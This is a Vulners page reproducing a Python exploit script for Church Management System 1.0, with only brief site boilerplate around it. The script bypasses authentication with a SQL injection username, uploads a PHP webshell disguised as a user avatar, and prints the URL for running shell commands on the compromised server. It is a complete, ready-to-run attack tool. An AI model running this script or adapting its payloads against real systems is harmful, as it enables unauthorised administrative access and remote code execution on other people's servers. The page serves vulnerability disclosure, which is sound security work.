Vulners
Lucene search
Church Management System 1.0 SQL Injection / Code Execution
`# Exploit Title: Church Management System 1.0 - Authentication Bypass via SQLi + RCE
# Date: 21.09.2021
# Exploit Author: Janik Wehrli
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Version: 1.0
# Tested On: Ubuntu ,Windows 10 + XAMPP 7.4
# Description: Church Management System (CMS-Website) 1.0 suffers from an Authentication Bypass Vulnerability which gives access to the Admin Account. The Admin Dashboard allows us to upload a PHP webshell by creating a new user with a malicious Avatar Image.
import requests, sys
from colorama import Fore, Back, Style
from bs4 import BeautifulSoup
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
F = [Fore.RESET, Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE]
B = [Back.RESET, Back.BLACK, Back.RED, Back.GREEN, Back.YELLOW, Back.BLUE, Back.MAGENTA, Back.CYAN, Back.WHITE]
S = [Style.RESET_ALL, Style.DIM, Style.NORMAL, Style.BRIGHT]
info = S[3] + F[5] + '[' + S[0] + S[3] + '-' + S[3] + F[5] + ']' + S[0] + ' '
err = S[3] + F[2] + '[' + S[0] + S[3] + '!' + S[3] + F[2] + ']' + S[0] + ' '
ok = S[3] + F[3] + '[' + S[0] + S[3] + '+' + S[3] + F[3] + ']' + S[0] + ' '
ASCII_ART = """
_____ _ _ __ __ _ _____ __ __ _____
/ ____| | | | | \/ | | | / ____| \/ |/ ____|
| | | |__ _ _ _ __ ___| |__ | \ / | __ _ _ __ ___ | |_ | | | \ / | (___
| | | '_ \| | | | '__/ __| '_ \ | |\/| |/ _` | '_ ` _ \| __| | | | |\/| |\___ \
| |____| | | | |_| | | | (__| | | | | | | | (_| | | | | | | |_ | |____| | | |____) |
\_____|_| |_|\__,_|_| \___|_| |_| |_| |_|\__, |_| |_| |_|\__| \_____|_| |_|_____/
__/ |
V.1.0 https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
Exploit by Janik Wehrli
"""
# Set variables
print(ASCII_ART)
SERVER_URL = str(input("Type in your Church Manangement System URL e.g http://192.168.20.20: \n"))
LOGIN_URL = SERVER_URL + '/church_management/classes/Login.php?f=login'
UPLOAD_URL = SERVER_URL + "/church_management/classes/Users.php?f=save"
PWN_URL = SERVER_URL + "/church_management/uploads/"
USERNAME = "'OR 1=1#"
PASSWORD = "PWNED"
WEBSHELL_NAME = ""
# Uncomment the bottom line to run the exploit through a proxy such as burp
# proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
# Create a simple web session with python
s = requests.Session()
# GET request to webserver - Start a session & retrieve a session cookie
get_session = s.get(LOGIN_URL, verify=False)
# Check connection to website & print session cookie to terminal OR die
if get_session.status_code == 200:
print(ok + 'Successfully connected to Bike Rental PHP server & created session.')
print(info + "Session Cookie: " + get_session.headers['Set-Cookie'])
else:
print(err + 'Cannot connect to the server and create a web session.')
sys.exit(-1)
# 1. Bypass Login
# POST data to bypass Authentication via SQL Injection
login_data = {'username': USERNAME, 'password': PASSWORD, 'login': ''}
print(info + "Attempting to Login to Church Management v1.0 the following payload: "+ "username:" + USERNAME + ":" + "password:"+ PASSWORD)
# auth = s.post(url=LOGIN_URL, data=login_data, verify=False, proxies=proxies)
auth = s.post(url=LOGIN_URL, data=login_data, verify=False, allow_redirects=True)
if auth.status_code == 200:
print(ok, "Success")
else:
print(err, "Something Went Wrong")
# 2. Upload Webshell
# Content-Disposition: form-data; name="img"; filename="pwn.php"
# Content-Type: application/octet-stream
webshell = {
'img':
(
'pwn.php',
'6 a $2y$10$Nw16tMpX3SyhtPrhBMD1Ku4jntwsRyQOANFs3.Ikv8eXpoQ0RL9PK\n <?php echo shell_exec($_GET["cmd"]);?> \n',
'application/octet-stream',
{'Content-Disposition': 'form-data'}
)
}
fdata = {'firstname': 'test2', 'lastname': 'test2', 'username': 'test2', 'password': 'test2'}
print(info + "Exploiting Church Management v1.0 file upload vulnerability via User Avatar to upload a PHP webshell")
# upload_webshell = s.post(url=UPLOAD_URL, files=websh, data=fdata, verify=False, proxies=proxies)
upload_webshell = s.post(url=UPLOAD_URL, files=webshell, data=fdata, verify=False)
if upload_webshell.status_code == 200:
print(ok, "Success")
else:
print(err, "Something Went Wrong")
uploaded_site = requests.get(PWN_URL)
soup = BeautifulSoup(uploaded_site.content, 'html.parser')
for a in soup.find_all('a', href=True):
b = a['href']
if "php" in b:
WEBSHELL_NAME = b
break
if upload_webshell.status_code == 200:
print(ok, "Your Webshell is located under: "+ PWN_URL + WEBSHELL_NAME)
print(ok, "Execute Commands via the GET Parameter 'cmd' for e.g " + PWN_URL + WEBSHELL_NAME+"?cmd=whoami")
else:
print(err, "Something went wrong")
dates = soup.findAll("href")
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Sep 2021 00:00Current
0.5Low risk
Vulners AI Score0.5